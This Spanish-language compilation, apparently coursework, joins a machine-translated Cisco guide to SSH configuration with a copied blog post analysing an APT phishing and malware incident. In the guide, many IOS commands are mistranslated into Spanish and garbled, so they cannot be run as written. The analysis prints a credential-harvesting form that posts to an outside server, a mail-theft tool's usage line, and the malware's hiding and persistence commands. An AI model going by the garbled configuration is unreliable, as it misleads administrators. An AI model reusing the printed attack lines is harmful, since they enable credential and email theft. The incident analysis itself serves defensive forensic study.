Software Advisor ( registrados slo los clientes) con el fin de ayudarle a encontrar la versin de cdigo con el apoyo adecuado, ya sea para SSH v1 v2 o SSH. Diagrama de red ssh-1.gif Prueba de autenticacin Prueba sin autenticacin SSH

Primera prueba de la autenticacin sin SSH para asegurarse de que la autenticacin trabaja con el router de Carter antes de agregar SSH. La autenticacin puede ser un nombre de usuario y contrasea locales o con una autenticacin, autorizacin y contabilidad (AAA) del servidor que ejecuta TACACS + o RADIUS. (Autenticacin a travs de la contrasea de la lnea no es posible con SSH.) Este ejemplo muestra la autenticacin local, que le permite Telnet en el router con el nombre de usuario "cisco" y la contrasea "cisco".

! --- El aaa nuevo modelo de comando hace que el nombre de usuario y contrasea locales en el router ! --- Para ser utilizado en ausencia de otras declaraciones de AAA. aaa nuevo modelo Nombre de usuario contrasea cisco cisco 0 line vty 0 4 de transporte de entrada de telnet ! --- En vez de aaa nuevo modelo, puede utilizar el comando de inicio de sesin local. Prueba de la autenticacin con SSH Para poner a prueba la autenticacin de SSH, usted tiene que aadir a las declaraciones anteriores con el fin de habilitar SSH en Carter y SSH de prueba desde el PC y estaciones UNIX. ip domain-name rtp.cisco.com ! --- Generacin de una clave SSH para ser usado con SSH. crypto key generate rsa ip ssh tiempo de espera de 60 ip autenticacin de ssh-reintentos 2 En este punto, el programa clave de cifrado RSA mypubkey comando debe mostrar la clave generada. Despus de agregar la configuracin de SSH, prueba su capacidad para acceder al router desde el PC y la estacin de UNIX. Si esto no funciona, consulte la seccin de depuracin de este documento. Configuracin opcional de configuracin Prevenir para no SSH Conexiones Si desea evitar que las conexiones SSH no, agregue la entrada de transporte de SSH en las lneas de comandos para limitar el router para conexiones SSH solamente. Recta (no SSH) telnet se neg. line vty 0 4 ! --- Impedir que los no-SSH telnet. de transporte de entrada ssh

Prueba para asegurarse de que no los usuarios no pueden SSH Telnet al router de Carter. Configurar un Router o Switch IOS como SSH Client Hay cuatro pasos necesarios para habilitar el soporte SSH en un router Cisco IOS: Configurar el comando hostname. Configure el dominio DNS. Generar la clave SSH que se utilizar. Habilitar el soporte SSH de transporte para el tipo de terminal virtual (vtys). Si usted desea tener un dispositivo de actuar como un cliente SSH para el otro, puede agregar SSH a un segundo dispositivo llamado Reed. Estos dispositivos estn entonces en un acuerdo de cliente-servidor, donde Carter acta como servidor, y Reed acta como el cliente. El Cisco IOS de configuracin del cliente SSH en Reed es el mismo que requiere de la configuracin del servidor SSH en Carter.

! --- Paso 1: Configure el nombre si no lo ha hecho anteriormente. nombre carter ! --- El aaa nuevo modelo de comando hace que el nombre de usuario y contrasea locales en el router ! --- Para ser utilizado en ausencia de otras declaraciones de AAA. aaa nuevo modelo Nombre de usuario contrasea cisco cisco 0 ! --- Paso 2: Configure el dominio DNS del router. ip domain-name rtp.cisco.com ! --- Paso 3: Generar una clave SSH para ser usado con SSH. crypto key generate rsa ip ssh tiempo de espera de 60 ip autenticacin de ssh-reintentos 2 ! Paso --- 4: Por defecto, el transporte vtys es Telnet. En este caso, ! --- Telnet est desactivado y slo SSH compatible. line vty 0 4 de transporte de entrada SSH

! --- En vez de aaa nuevo modelo, puede utilizar el comando de inicio de sesin local. Ejecute este comando a SSH desde el Cisco IOS cliente SSH (Reed) de Cisco IOS servidor SSH (Carter) con el fin de probar esto: SSH v1: ssh-l-cisco c 3des 10.13.1.99 SSH v2: ssh-v 2-c AES256-CBC-m HMAC-SHA1-160-L Cisco 10.31.1.99 Configuracin de un router IOS como un servidor de SSH que realiza la autenticacin del usuario, segn RSA Siga estos pasos para configurar el servidor SSH para realizar la autenticacin basada en RSA. Especificar el nombre de host. Router (config) # hostname <nombre de host> Definir un nombre de dominio predeterminado. Router (config) # ip domain-name <Nombre de dominio> Generar pares de claves RSA. Router (config) # crypto key generate rsa Configurar SSH RSA claves para el usuario y la autenticacin del servidor. Router (config) # ip ssh pubkey de cadena Configure el nombre de usuario SSH. Router (conf-ssh-pubkey) # nombre de usuario <nombre de usuario> Especificar la clave RSA pblica del extremo remoto. Router (conf-ssh-pubkey-usuario) # cadena-clave Especificar el tipo de claves SSH y la versin. (Opcional) Router (conf-ssh-pubkey de datos) # clave hash ssh-rsa <key ID> Salir del modo actual y volver al modo EXEC privilegiado.

Router (conf-ssh-pubkey de datos) # end Nota: Consulte la versin segura Shell 2 Soporte para ms informacin. Aadir SSH Terminal acceso en lnea Si usted necesita de salida de terminal SSH-line de autenticacin, puede configurar y probar SSH para telnet inverso de salida a travs de Carter, que acta como un servidor de comunicacin a Filadelfia. ip ssh puerto 2001 giratorio 1 lnea 1 16 no ejecutivo giratorio 1 de transporte de entrada ssh exec-timeout 0 0 mdem en salir Bits de parada 1 Si Filadelfia es conectado al puerto de Carter 2, se puede configurar SSH a Filadelfia a travs de Carter de Reed con la ayuda de este comando: SSH v1: ssh-c 3des-p 2002 10.13.1.99 SSH v2: ssh-v 2-c AES256-CBC-m HMAC-SHA1-160-p 2002 10.31.1.99 Puede utilizar este comando de Solaris: ssh-c 3des-p 2002-x-v 10.13.1.99 Restringir el acceso SSH a una subred Es necesario limitar la conectividad SSH a una subred especfica en todos los dems intentos de SSH desde fuera de la subred IP debe suprimirse. Usted puede utilizar estos pasos para llevar a cabo la misma: Definir una lista de acceso que permita el trfico de esa subred especfica. Restringir el acceso a la interfaz de lnea VTY con una clase de acceso. Este es un ejemplo de configuracin. En este ejemplo, slo el acceso SSH a la subred 255.255.255.0 10.10.10.0 est permitida, ningn otro se le niega el acceso.

Router (config) # access-list 23 permiten 10.10.10.0 0.0.0.255 Router (config) # line vty 5 15 Router (config-line) # de transporte de entrada ssh Router (config-line) # access-class 23 en Router (config-line) # exit Nota: El mismo procedimiento para bloquear el acceso SSH tambin se aplica en las plataformas del interruptor. Configurar la versin SSH Configurar SSH v1:
carter (config)#ip ssh version 1

Configurar SSH v2:

carter (config)#ip ssh version 2

Configurar SSH v1 y v2:

carter (config)#no ip ssh version

Variaciones en la salida de bandera Comando La salida del comando bandera vara entre las versiones de Telnet y diferentes tipos de conexiones SSH. Esta tabla muestra cmo las diferentes opciones de comando bandera de trabajar con varios tipos de conexiones. depuracin y mostrar los comandos Antes de emitir los comandos de. Ciertos comandos muestran el apoyo de la herramienta intrprete de salida ( registrados slo los clientes), lo que le permite ver un anlisis de la salida de algn comando. debug ip sshMuestra los mensajes de depuracin para SSH. show sshMuestra el estado de las conexiones del servidor SSH.
carter#show ssh Connection Version Encryption 0 1.5 DES State Session started Username cisco

show ip ssh-Muestra la versin y los datos de configuracin de SSH. La versin 1 de conexin y no la versin 2
carter#show ip ssh SSH Enabled - version 1.5

Authentication timeout: 60 secs; Authentication retries: 2

La versin 2 de conexin y no la versin 1

carter#show ip ssh SSH Enabled - version 2.0 Authentication timeout: 120 secs; Authentication retries: 3

Versin 1 y 2 conexiones
carter#show ip ssh SSH Enabled - version 1.99 Authentication timeout: 120 secs; Authentication retries: 3

Ejemplo de salida de depuracin Router de depuracin Nota: Parte de este buen resultado de la depuracin es ajustado a varias lneas debido a consideraciones de espacio.
00:23:20: 00:23:20: 00:23:20: 00:23:20: 00:23:21: 00:23:21: 00:23:21: 00:23:21: 00:23:21: 00:23:21: 00:23:21: 00:23:21: 00:23:21: 00:23:21: 00:23:23: 00:23:23: 00:23:23: 00:23:23: length 00:23:23: 00:23:23: 00:23:23: SSH0: starting SSH control process SSH0: sent protocol version id SSH-1.5-Cisco-1.25 SSH0: protocol version id is - SSH-1.5-1.2.26 SSH0: SSH_SMSG_PUBLIC_KEY msg SSH0: SSH_CMSG_SESSION_KEY msg - length 112, type 0x03 SSH: RSA decrypt started SSH: RSA decrypt finished SSH: RSA decrypt started SSH: RSA decrypt finished SSH0: sending encryption confirmation SSH0: keys exchanged and encryption on SSH0: SSH_CMSG_USER message received SSH0: authentication request for userid cisco SSH0: SSH_SMSG_FAILURE message sent SSH0: SSH_CMSG_AUTH_PASSWORD message received SSH0: authentication successful for cisco SSH0: requesting TTY SSH0: setting TTY - requested: length 24, width 80; set: 24, width 80 SSH0: invalid request - 0x22 SSH0: SSH_CMSG_EXEC_SHELL message received SSH0: starting shell for vty

Servidor de depuracin Nota: Esta salida fue capturado en una mquina Solaris. rtp-evergreen.rtp.cisco.com#ssh -c 3des -l cisco -v 10.31.1.99 rtp-evergreen#/opt/CISssh/bin/ssh -c 3des -l cisco -v 10.13.1.99 SSH Version 1.2.26 [sparc-sun-solaris2.5.1], protocol version 1.5. Compiled with RSAREF. rtp-evergreen: Reading configuration data /opt/CISssh/etc/ssh_config rtp-evergreen: ssh_connect: getuid 0 geteuid 0 anon 0 rtp-evergreen: Allocated local port 1023. rtp-evergreen: Connecting to 10.13.1.99 port 22.

rtp-evergreen: Connection established. rtp-evergreen: Remote protocol version 1.5, remote software version Cisco-1.25 rtp-evergreen: Waiting for server public key. rtp-evergreen: Received server public key (768 bits) and host key (512 bits). rtp-evergreen: Host '10.13.1.99' is known and matches the host key. rtp-evergreen: Initializing random; seed file //.ssh/random_seed rtp-evergreen: Encryption type: 3des rtp-evergreen: Sent encrypted session key. rtp-evergreen: Installing crc compensation attack detector. rtp-evergreen: Received encrypted confirmation. rtp-evergreen: Doing password authentication. cisco@10.13.1.99's password: rtp-evergreen: Requesting pty. rtp-evergreen: Failed to get local xauth data. rtp-evergreen: Requesting X11 forwarding with authentication spoofing. Warning: Remote host denied X11 forwarding, perhaps xauth program could not be run on the server side. rtp-evergreen: Requesting shell. rtp-evergreen: Entering interactive session.

He aqu otro ejemplo en este link. http://www.cisco.com/en/US/products/hw/switches/ps708/products_tech_note09186a0080 15c612.shtml

Investiga en las noticias algn caso de ataque real donde podra haberse utilizado una de estas soluciones. Advance Persistent Threat Es un concepto que muchos ya sabris este se denomina APT que significa Advance Persistent Threat, que no es otra cosa que un nuevo vector de ataque que tiene un propsito definido y que su objetivo es abrir una brecha o fallo de seguridad sin que la empresa tenga constancia de que la tiene y de ah robar la mayor informacin posible. Es un tipo de ataque que se alarga en el tiempo y suele pasar inadvertido por usuarios y administradores de sistemas. Los atacantes suelen actuar en equipo y poseen altos conocimientos de seguridad informtica. Muchos de estos ataques son financiados por gobiernos o el cibercrimen y tienen relaciones polticas, econmicas o militares. Aqu interviene el dicho "la informacin es poder". EL CASO

En el mes de Julio estuve colaborando con una compaa que de forma rutinaria descubri con asombro que su empresa era objeto de un ataque APT. Segn me comentaba el cliente (una firma de alto prestigio internacional dedicada a la auditora y consultora) nada les hacia pensar que ellos mismos podran ser objetivos de un ataque de esta magnitud. A da de hoy, los dirigentes de esta compaa no son capaces de cuantificar que y cuanto ha podido ser sustrado y que problemas les puede venir en el futuro. Nuestro caso empieza con una simple alerta de un usuario (un directivo) que dice haber recibido un correo de un colaborador externo (de otro directivo) y en el que le solicitan que introduzca las credenciales de una cuenta de gmail (que el no dispone) para el acceso a unos documentos de Google Docs. Tras una revisin por parte de los administradores se detecta que han recibido cientos de correos dirigidos a empleados solicitando las claves de gmail de los usuarios. Hasta aqu puede ser otro caso ms de phising y los administradores podran haber marcado el correo y 'santas pascuas', nadie se hubiera enterado, pero parece ser que muchos usuarios han introducido las claves y han abierto estos documentos, detectando ms tarde como veremos que se han infectado con un curioso malware. ANALISIS DEL ATAQUE: Procedemos tras unos das de investigacin, a revisar los correos que los usuarios han recibido. Como deca anteriormente, las vctimas reciben un mensaje desde una direccin de email que aparentemente es de un estrecho colaborador de una de las empresas que forman este grupo empresarial y que evidentemente mas tarde se demostr que es falsa. El contenido del correo es un formulario que 'invita' a introducir las credenciales de 'gmail' para acceder a Google Docs con un sugerente contenido de correo con ficheros adjuntos de nombres "Technical_Airport_Docs.docx" "Report_confidential_employees.xls".

El formulario HTML est codificado en Base64 y las cabeceras del correo vienen a decir lo siguiente: ........................ Received: from omh-ma01.r1000.mx.aol.com (omh-ma01.r1000.mx.aol.com [172.29.41.7]) by mtaout-da03.r1000.mx.aol.com (MUA/Third Party Client Interface) with ESMTP id 663DEE0000F1 for XXXXXXXX@gmail.com>; Tue, 11 Jul 2011 12:32:11 -0400 Received: from mtaout-ma02.r1000.mx.aol.com (mtaout-ma02.r1000.mx.aol.com [172.29.41.2]) by omh-ma01.r1000.mx.aol.com (AOL Outbound Holding Interface) with ESMTP id 5CDF8E000086 for XXXXXXXX@gmail.com>; Tue, 11 Jul 2011 12:32:11 -0400 Received: from web-server (unknown [122.146.219.130]) by mtaout-ma02.r1000.mx.aol.com (MUA/Third Party Client Interface) with SMTP id 40157E000F42 for XXXXXXXX@gmail.com>; Tue, 11 Jul 2011 12:32:11 -0400 Date: Tue, 11 Jul 2011 12:32:11From: XXXXXXXXXXXXX To: XXXXXXXXXX Subject: Nueva documentacin: Novedades X-Mailer: Foxmail 6, 10, 201, 20 - Foxmail es muy utilizado en China para realizar ataques de phising Mime-Version: 1.0 Content-Type: text/html; Content-Transfer-Encoding: base64 X-AOL-SCOLL-SCORE: 1:2:254689392:93952408 X-AOL-SCOLL-URL_COUNT: 2 X-AOL-IP: 122.146.219.130 - Ubicado en Taipei en Taiwan x-aol-global-disposition: G

X-AOL-SCOLL-SCORE: 1:2:278191424:93952408 X-AOL-SCOLL-URL_COUNT: 2 x-aol-sid: 3039ac1d33834e37e77f14f3 PGI+WW91ciBhY2NvdW50IHdpbGwgYmUgbG9ja2VkIGZvciB1bnVzdWFsIGFjY291b nQgYWN0 aXZpdHksIHdoaWNoIGluY2x1ZGVzLCBidXQgaXMgbm90IGxpbWl0ZWQgdG86PGJy Pg0KPG9s Pg0KPGxpPlJlY2VpdmluZywgZGVsZXRpbmcsIG9yIGRvd25sb2FkaW5nIGxhcmdlIGFt b3Vu dHMgb2YgbWFpbCB2aWEgUE9QIG9yIElNQVAgaW4gYSBzaG9ydCBwZXJpb2Qgb2 YgdGltZS48 L2xpPg0KPGxpPlNlbmRpbmcgYSBsYXJnZSBudW1iZXIgb2YgdW5kZWxpdmVyYWJs ZSBtZXNz YWdlcyAobWVzc2FnZXMgdGhhdCBib3VuY2UgYmFjaykuPC9saT4NCjxsaT5Vc2luZy BmaWxl LXNoYXJpbmcgb3IgZmlsZS1zdG9yYWdlIHNvZnR3YXJlLCBicm93c2VyIGV4dGVuc2 lvbnMs IG9yIHRoaXJkIHBhcnR5IHNvZnR3YXJlIHRoYXQgYXV0b21hdGljYWxseSBsb2dzIGl uIHRv ........truncado a proposito La informacin nos indica:

Es decir el correo parece que tiene su origen desde Taiwan, ahora procedemos a ver el contenido del formulario 'html' previamente descodificado. Esta es la informacin que ofrece (en color rojo): form name=3D"1318a6060f9f02b2_mygmail_loginform" action=3D"http://www.lsbu.ac.uk/php4-cgiwrap/hscweb/cm/login.php" method=3D"post" target=3D"_blank" ons=

ubmit=3D"alert("This form has been disabled."); return false">{di= v name=3D"gaia_loginbox"> -------------------------------input name=3D"AGALX" value=3D"NIE34iN5DAAYY" type=3D"hidden">=20 input name=3D"myEmail" size=3D"18" value=3D"xxxxxxxxxxxxxxx@gmail.com"
typ= e=3D"text">{/td>

Una URL que apunta a un servidor web propiedad de London South Bank University y que nada tiene que ver con los dominios del cliente, revisando el dominio (lsbu.ac.uk), vemos que apunta a una direccin ubicada en Reino Unido. La pregunta es Estar comprometido el servidor?

A continuacin procedo a introducir en el formulario unas credenciales falsas de una cuenta que me he creado previamente en Gmail. Tambin capturo el trafico para ver que informacin devuelve.

Si nos fijamos en la captura del trfico, estamos mandando las claves al atacante y una vez enviadas nos dirige a una url de Google Docs. Lo curioso del tema es que es una url pblica a la que se accede sin autenticacin.

Como es de sospechar, hay muchas posibilidades de que nos encontremos con malware, o quizs algn 0 Day. En este punto 'clonamos' y virtualizamos el equipo windows de la persona que dio la alerta a los administradores con objeto de simular de forma precisa el entorno. Tras iniciar el entorno virtual y ponernos a analizar el documento procedemos como medida cautelar a descargarlo y enviarlo a Virus Total, con nulos resultados.

En apariencia no hay malware (0 de 44 motores ), pero lo mejor es ejecutarlo y para ello vamos a proveernos de nuestras mejores tools de nuestra preciada caja de herramientas y aadir las de Sysinternals con objeto de monitorizar lo que hace en nuestro entorno

Windows. Os recomiendo la lectura del blog del grande Mark Russinovich el autor de Sysinternals sobre "Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 1, 2, 3"y que podis leer desde aqu. Me dispongo a lanzar el documento y espero unos minutos para que en el mejor de los casos si es un malware le de tiempo al equipo infectarse tranquilamente. Esto es lo que ha ocurrido de una forma resumida. El archivo '.docx' da un clsico error de 'runtime' como el siguiente:

Tal y como lo estamos monitorizando, se ha lanzado un proceso de nombre 'file.exe' y se ha creado un fichero '.html' en la siguiente ruta:
C:\Documents and Settings\KLY\Local Settings\Temp\mhzksbnz.html

Revisando los strings del nuevo proceso apunta a que registra las pulsaciones del teclado. ser un keylogger? El proceso 'file.exe' crea tambin un fichero 'UpdaterInfo.dat' y diversas libreras .dll y otros diversos ficheros 'html'.

En este momento hago un volcado de memoria utilizando Dumpit de la empresa MoonSols y cuyo fundador es el gran Matthieu Suiche. DumpIt es una fusin de win32dd y win64dd en un nico archivo ejecutable. Slo un doble clic sobre el ejecutable es suficiente para generar una copia de la memoria fsica en el directorio actual. Tras el anlisis del fichero de memoria, utilizando las tools de Volatility procedo a extraer el proceso del fichero de memoria y enviarlo a Anubis (un analizador de binarios) confirmando que efectivamente se trata de un keylogger. (ver reporte aqu) No obstante con objeto de comprobarlo y mirando tal y como indica el informe, efectivamente existe el fichero en la mquina clonada y el contenido de UpdaterInfo.dat contiene todo lo tecleado hasta el momento.

CONTINUAMOS...

Seguimos investigando y vemos que el proceso lanza una conexin a internet y por HTTP se conecta al siguiente dominio 'tomitomi.cn - 195.248.234.157' (registrado a nombre de Zhejiang 5 Red interior design company) y procede a la descarga de un fichero comprimido de nombre 'gamer.zip'

Este fichero se almacena en la carpeta 'temp' y contiene a su vez los siguientes ficheros:

iam.exe iam.dll m.exe r.exe y.exe sas.bat

Los ficheros 'iam.exe' e 'iam.dll', son detectados por virustotal como herramientas de Hacking, el fichero 'y.exe' es detectado por 25 motores de 41 como malware y los dems archivos no son detectados por ninguno de los motores. IAM.EXE - IAM.DLL Los ficheros 'iam.exe' e 'iam.dll' no son exactamente malware y pertenecen a un conjunto de herramientas de la empresa CORE SECURITY. Estos ficheros (segn se indica en la web) permite cambiar en memoria las credenciales NTLM asociados con la sesin actual de Windows, es decir el nombre de usuario, dominio y hashes. Todo apunta a que este 'raro-ware' esta pensado para robar las credenciales de los usuarios. M.EXE 'm.exe' es una variacin de 'getmail' y sirve para recuperar mensajes de correo electrnico He adjuntado los dos 'strings' de ambos, con objeto de ver si contiene algo interesante y vaya si lo tiene.

'm.exe' se puede utilizar para recuperar mensajes de correo electrnico de un servidor Exchange. El uso segn los 'strings' es el siguiente: Ejemplo: %s -s:sn-server1.mailserver.com -u:exuser4 -t:2011-7-25-14 -o:c:\winnt\temp %s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath Es necesario especificar el nombre de usuario, nombre del servidor, rango de fechas y la ubicacin donde guardar los correos robados. Una vez lanzado al servidor Exchange los mensajes de correo electrnico se convertir en texto y archivos adjuntos guardados en carpetas. R.EXE El ejecutable 'r.exe' es el archivo 'rar.exe' de Winrar, dado que no tiene huella para comprobar su integridad, procedo a descargarlo y aplicar la huella en MD5 y SHA1 coincidiendo ambas dos y dado que no me fo vuelvo a pasarlo por Virustotal y varios analizadores de binarios. Tambin comparo los strings, aparentemente es el mismo fichero.

Y.EXE 'y.exe' aade al sistema funcionalidades de rootkit, ya que registra los procesos que se ejecutan al iniciar el sistema, crea archivos en el directorio Windows, modifica partes del registro y sustituye comandos de sistema operativo. Entre ellos crea el fichero 'C:\WINDOWS\system32\prxy.dll' y un archivo por lotes de nombre 'sas.bat' a continuacin se crea un proceso basando en 'cmd.exe' con el siguiente comando 'cmd /c rundll32 prxy.dll,RundllInstall' y con los posteriores comandos: cmd /c attrib +h +s prxy.dll cmd /c net start bits cmd /c net stop bits cmd /c rundll32 prxy.dll,RundllInstall prxy.dll cmd /c sas.bat del %s del %s /as ping 127.0.0.1 -n 3 del sas.bat PRXY.DLL

Creado por 'Y.EXE' parece que reemplaza el servicio legitimo BITs de windows ubicado en la siguiente rama del registro: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters 'prxy.dll' parece que permite la descarga de software sin que los antivirus o cortafuegos hagan algo al respecto, dado que al tratarse de un servicio legitimo estos permiten la entrada y salida de trafico hacia internet. (esto no lo tenemos claro todava) SAS.BAT Como su nombre indica es un fichero de proceso por lotes y quizs este es el mas sorprendente de los ficheros analizados por el contenido.

Se puede apreciar que este fichero es parte de otro y que su objetivo es capturar hashes y contraseas. Una vez las obtiene (al igual que los correos en formato texto) se propone a empaquetarlas en un archivo que no ofrezca sospechas como ~WRD0100.tmp. He de decir que no se han encontrado los ejecutables 'PWDumpx.exe'. Si descomprimimos el archivo ~WRD0100.tmp nos encontramos con lo siguiente:

Un montn de correos electrnicos, presumiblemente lanzados por el ejecutable 'm.exe' CONSIDERACIONES Aunque no hemos realizado ingeniera inversa de la mayora de los ejecutables (estamos todava en ello) podemos determinar que disponemos de un montn de evidencias de que la empresa ha sido vctima presumiblemente de un ataque auto-dirigido. QUE HA OCURRIDO? Bueno aunque con este desglose todava es pronto para dar unas conclusiones exactas de lo ocurrido, me atrevo a decir lo siguiente: Los hackers, han lanzado un ataque auto-dirigido con objeto de comprometer las cuentas de Gmail y apoderarse de datos privados de los empleados de est empresa, (no me atrevo a decir con que objeto). Aprovechando el ataque han instalado (utilizando ingeniera social)

desde un keylogger hasta un kit de herramientas para la elevacin de permisos, obtencin de documentos y correos electrnicos. Por lo que parece no se sabe muy bien si esto ha llegado a funcionar, dado que parece que faltan ejecutables y todo apunta a que no estaba muy bien construido el malware, pero solo es una opinin y todava faltan cosas por contrastar. CONCLUSIONES? En este punto surgen muchas dudas, por ejemplo Como se envan los datos robados y a quien?. porque quieren las cuentas de gmail de estos usuarios?, Quien tiene este especial inters?, Es alguien de dentro o de fuera?, Desde cuanto tiempo llevan actuando?. Stutnex dio la bandera de salida, fue famoso internacionalmente por su complejidad e innovacin, pero la cuestin es cuantos de estos ataques en menor medida pasan en las empresas?, un pendrive en la puerta de un bar donde vas a tomar caf, no lo 'enchufaras' para ver lo que hay?. Miramos lo suficiente nuestros log's de sistemas y aplicaciones?, quizs llegado a este punto donde la tecnologa es parte fundamental de nuestra vida, deberamos de prestar especial atencin a esas pequeas cosas como un escaneo de red, trfico que no solemos tener o una regla modificada. Deberemos de pensar en cosas como SIEM y disponer de inteligencia en nuestros sistemas de informacin que informen ante una anomala. Todava son muchas preguntas sin respuesta y en este instante mientras lees el post, en esta empresa (que sufre en silencio las hemorroides) siguen limpiando, revisando log's y actualizando polticas de contraseas. Tambin estamos haciendo el anlisis forense y quedan muchas cosas por mirar. Una cosa ms y por ltimo, a da de hoy, algo o alguien todava entra en mi cuenta ficticia de Gmail.

Referencias
http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.1E/native/configuration /guide/storm.html http://www.udb.edu.sv/Academia/Laboratorios/electronica/Administracion%20de%20Redes/ guia6ADR.pdf http://librosnetworking.blogspot.com/2007/01/funcionalidades-span-para-monitoreo-de.html http://www.itesm.mx/viti/servicios/soporte_red/TYR-CCS-P2.pdf http://www.undec.edu.ar/PDF/seguridad_capa2.pdf http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.1E/native/configuration /guide/port_sec.html#wp1042596 http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.1E/native/configuration /guide/port_sec.pdf http://www.cisco.com/en/US/docs/switches/datacenter/sw/4_2/nxos/system_management/configuration/guide/sm_14span.html http://www.cisco.com/en/US/docs/switches/lan/catalyst4000/7.4/configuration/guide/stp_e nha.html http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.1E/native/configuration /guide/121eswcg.pdf http://www.linuxtotal.com.mx/index.php?cont=info_seyre_003 http://www.cisco.com/en/US/products/hw/switches/ps708/products_tech_note09186a0080 15c612.shtml http://conexioninversa.blogspot.com/2011/09/un-ataque-persistente-apt.html